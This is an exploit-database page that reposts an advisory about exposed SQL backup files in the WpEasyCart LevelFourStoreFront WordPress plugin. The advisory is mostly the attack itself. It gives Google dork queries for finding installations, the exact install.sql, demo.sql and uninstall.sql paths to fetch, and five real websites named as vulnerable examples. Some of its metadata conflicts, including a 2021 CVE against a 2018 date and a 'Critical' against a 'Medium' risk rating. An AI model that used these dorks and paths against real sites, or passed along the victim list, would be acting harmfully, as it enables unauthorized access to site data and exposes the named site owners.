Advertisement






WordPress WpEasyCart LevelFourStoreFront Plugins 8.1.16 Database Backup Disclosure

CVE Category Price Severity
CVE-2021-24542 CWE-264 $500 High
Author Risk Exploitation Type Date
Kevin Keidel Critical Remote 2018-12-11
CPE
cpe:cpe:/a:wordpress:wpeasycart:levelfourstorefront_plugins:8.1.16
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 0.003 0.55

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120105

Below is a copy:

WordPress WpEasyCart LevelFourStoreFront Plugins 8.1.16 Database Backup Disclosure
#################################################################################################

# Exploit Title : WordPress WpEasyCart LevelFourStoreFront Plugins 8.1.16 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/12/2018
# Vendor Homepage : levelfourdevelopment.com ~ wpeasycart.com ~ profiles.wordpress.org/levelfourstorefront
# Software Download Link : wpeasycart.com/wp-easycart-professional-14-no-risk-trial/
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.1.8 and 8.1.16
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/levelfourstorefront/''
intext:''  Copyright - WP EasyCart - Proudly Developed & Supported by the L4 team in the USA''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path : 

/wp-login.php

# Exploit : 

/wordpress/wp-content/plugins/levelfourstorefront/scripts/sql/install.sql

/wp-content/plugins/levelfourstorefront/scripts/sql/install.sql

/wp-content/plugins/levelfourstorefront/scripts/sql/demo.sql

/wp-content/plugins/levelfourstorefront/scripts/sql/uninstall.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] levelfourstorefront.com/version81wp3/wp-content/plugins/levelfourstorefront/scripts/sql/install.sql

[+] pomcs.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/sql/install.sql

[+] kimberlynicoledesigns.com/wp-content/plugins/levelfourstorefront/scripts/sql/install.sql

[+] midmathstore.com/midmathstore1/wp-content/plugins/levelfourstorefront/scripts/sql/install.sql

[+] projekgreenbird.org.my/wp-content/plugins/levelfourstorefront/scripts/sql/install.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.